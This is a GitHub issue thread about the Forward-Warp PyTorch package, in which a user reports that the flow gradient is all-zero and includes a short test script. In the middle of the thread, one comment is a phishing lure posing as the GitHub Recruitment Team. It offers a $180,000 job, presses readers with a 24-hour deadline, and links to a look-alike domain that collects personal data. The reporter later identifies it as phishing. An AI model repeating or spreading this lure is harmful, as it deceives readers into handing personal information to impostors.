### ISSUE TITLE
Grad of all-zero flow

### ISSUE THREAD

**Issue by askerlee** [lizhihao6/Forward-Warp#11]
In the simplest case, if the flow is a zero tensor, all source elements are copied to the same position in the target tensor. If flow changes slightly, the target tensor will also change, that means the flow gradient is non-zero.
However, this test code shows otherwise:

```
from Forward_Warp import forward_warp
import torch

a = torch.randn(1,1,5,5)
flow = torch.zeros(1,5,5,2, requires_grad=True)
fwarp = forward_warp()
b =fwarp(a, flow)
b.sum().backward()
print(flow.grad)
# flow.grad is an all-zero tensor.
```

Any idea what's the issue? Thanks.

**Comment by askerlee** [comment]
I also tried to use random flow, and flow.grad is still all-zero. This seems quite weird.

**Comment by LeonardoWlopes** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Erdemina, @geeksada, @EricSeltzer, @tomsto84, @Sasha6, @doyonghoon, @davidthornton, @wanglz111, @koenw, @geekwayne, @krahu, @K-kangaroo, @padevin, @CarlosLannister, @harshav167, @katbaguisi, @imisfer, @Schreibmaschinespricht, @john523, @forexpiphunter

**Comment by askerlee** [comment]
Phishing attack. I've reported to github.
